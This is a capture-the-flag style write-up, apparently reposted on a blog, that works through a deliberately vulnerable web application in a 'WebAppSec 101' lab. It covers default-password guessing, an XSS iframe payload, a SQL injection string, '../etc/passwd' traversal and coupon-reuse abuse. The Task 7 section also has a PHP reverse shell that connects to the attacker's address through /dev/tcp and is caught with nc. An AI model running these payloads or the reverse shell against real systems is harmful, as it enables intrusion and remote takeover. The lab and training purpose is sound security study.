WebAppSec 101-泓源视野

WebAppSec 101

[Task 1] Basic Description & Objectives

[Task 2] Walking through the application
- What version of Apache is being used?
- What language was used to create the website?
- What version of this language is used?

Let’s do the information gathering first.
1. Test web functionality
2. Home section → malicious file upload

WebAppSec 101插图

3. Home section — search → SQL injection, XSS

WebAppSec 101插图1
WebAppSec 101插图2

4. Home section — create account → SQL Injection
I fill every text box with “test”.

WebAppSec 101插图3
WebAppSec 101插图4

It seems like I logged in with user “test”.

5. Test similar name function

WebAppSec 101插图5

6. Your uploaded pics

WebAppSec 101插图6

7. Your purchased pics

WebAppSec 101插图7

8. Back to create account section — Let’s test for password strength → command injection

WebAppSec 101插图8
WebAppSec 101插图9
WebAppSec 101插图10

9. Check out sample user → Broken Access Control

WebAppSec 101插图11
WebAppSec 101插图12

10. Check out what is going on today

WebAppSec 101插图13

Click what about tomorrow until there’s is a coupon code.

WebAppSec 101插图14
WebAppSec 101插图14

11. Check upload section
Login first

WebAppSec 101插图15

It’s the same page as we visited before.

WebAppSec 101插图16

12. Check recent section

WebAppSec 101插图17

13. Check guestbook section → XSS

WebAppSec 101插图18

14. Check cart section

WebAppSec 101插图19

View some picture and buy it

WebAppSec 101插图20
WebAppSec 101插图21
WebAppSec 101插图22
WebAppSec 101插图23

15. Let’s view the bottom section → Password guessing, Brute-forcing, SQL injection

Admin

WebAppSec 101插图24

Contact

Terms of service

WebAppSec 101插图25

16. Search web paths with dirbuster
Results — I visited every links, but the links aren’t interesting.

WebAppSec 101插图26

17. Search site’s vulnerabilities and information.

nikto -h http://10.10.92.34/
WebAppSec 101插图27

18. Answer the questions
- What version of Apache is being used? 2.4.7
- What language was used to create the website? PHP
- What version of this language is used? 5.5.9

Conclusion
There’ re potential vulnerabilities:
1. Malicious file upload
2. SQL injection,
3. XSS
4. Command injection
5. Broken Access Control
6. Password guessing
7. Brute-forcing


[Task 3] Establishing a methodology

[Task 4] Authentication
What is the admin username?
- What is the admin password?
- What is the name of the cookie that can be manipulated?
- What is the username of a logged on user?
- What is the corresponding password to the username?

  1. Let’s try guessing admin username and password. There’ re 4 combinations that I can think of:
    - admin: admin
    -admin:password
    -root:root
    -root:password
  2. Let’s login in Login Panel
    None of the combinations worked
WebAppSec 101插图28

3. Let’s login in Admin Panel
Luckily “admin : admin” worked

WebAppSec 101插图29

Although, I clicked “Create a new user!”, but nothing worked.

WebAppSec 101插图30
WebAppSec 101插图31

To answer the question
-What is the admin username? admin
- What is the admin password? admin

4. Let’s try to find the cookie.
Back to home page

WebAppSec 101插图32

Inspect Element

WebAppSec 101插图33

In console tab, type

alert(document.cookie)
WebAppSec 101插图34

There’s PHPSESSID, but it’s the wrong answer.

WebAppSec 101插图35

Let’s try the method again in admin panel.

WebAppSec 101插图36

To answer the question
-What is the name of the cookie that can be manipulated? session

5. Let’s access other user data
Click “Check out a sample user!”

WebAppSec 101插图37

Try to break access control by manipulating parameter

WebAppSec 101插图38

These pictures are potential users
-Bob

-scanner1

-scanner2

-scanner3

WebAppSec 101插图39

-scanner4

WebAppSec 101插图40

-scanner5

WebAppSec 101插图41

-wanda

WebAppSec 101插图42

-calvinwatters

WebAppSec 101插图43

-bryce

I tried userid 12 and 13, but it’s the empty page. I’ll stop listing users method for now.

As a conclusion, there’re 9 potential users. I’ll try password guessing first by this list:
Bob → Bob:Bob, bob:bob
scanner1 → scanner1:scanner1
scanner2 → scanner2:scanner2
scanner3 → scanner3:scanner3
scanner4 → scanner4:scanner4
scanner5 → scanner5:scanner5
wanda → wanda:wanda
calvinwatters → calvinwatters:calvinwatters
bryce → bryce: bryce

Luckily, I can logged in with bryce:bryce

To answer the question
- What is the username of a logged on user? bryce
- What is the corresponding password to the username? bryce


[Task 5] Cross Site Scripting (XSS)
I used cheat sheet from https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

<iframe src="javascript:alert(1)">
  1. Test for XSS on the search bar

2. Test for XSS on the guestbook page

Name: <iframe src=”javascript:alert(1)”>
Comment: test

not work

Let’s try again

Name: test
Comment: <iframe src=”javascript:alert(1)”>

3. Test for XSS behind the flash form on the home page → I skipped this due to flash player is turned off.


[Task 6] Injection
- Perform command injection on the check password field
- Check for SQLi on the application

  1. Perform command injection on the check password field — I skipped this due to when I perform the injection, the machine will break itself.
  2. Check for SQLi on the application
    In login page put
' or 1=1--

not work though

Let’s try in register an account

works!!!


[Task 7] Miscellaneous & Logic Flaws

-Find a parameter manipulation vulnerability
-Find a directory traversal vulnerability
-Find a forceful browsing vulnerability
-Logic flaw: try get an item for free

  1. Find a parameter manipulation vulnerability
    — already done in Task 4 number 5
  2. Find a directory traversal vulnerability
    In upload a picture, I type command and upload some files.
../etc/passwd
WebAppSec 101插图44

Now, I get the path

WebAppSec 101插图45

Let’s type

http://<ip>/upload/
WebAppSec 101插图46

Try to upload reverse shell
Here’s my php reverse shell

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.8.21.124/1234 0>&1'");?>

Upload it

WebAppSec 101插图47

Success uploading

WebAppSec 101插图48

Check in /upload

WebAppSec 101插图49
WebAppSec 101插图50

Back to attacker’s machine

nc -lvp 1234

Click on the file

WebAppSec 101插图51

Back to attacker’s machine, now we have a shell

WebAppSec 101插图52

3. Find a forceful browsing vulnerability
Try to buy some image

WebAppSec 101插图53

Before purchasing it, users can access high quality image

WebAppSec 101插图54

4. Logic flaw: try get an item for free
In home section, click What is going on today?

WebAppSec 101插图55

Click What about tomorrow? until I have coupon code : SUPERYOU21

WebAppSec 101插图56

Back to the cart. Try to apply coupon twice

WebAppSec 101插图57

Apply until I don’t have to pay

WebAppSec 101插图58
WebAppSec 101插图59

This all THANKS

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。
5

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8233616 位访客, 您的IP是:[172.70.34.63]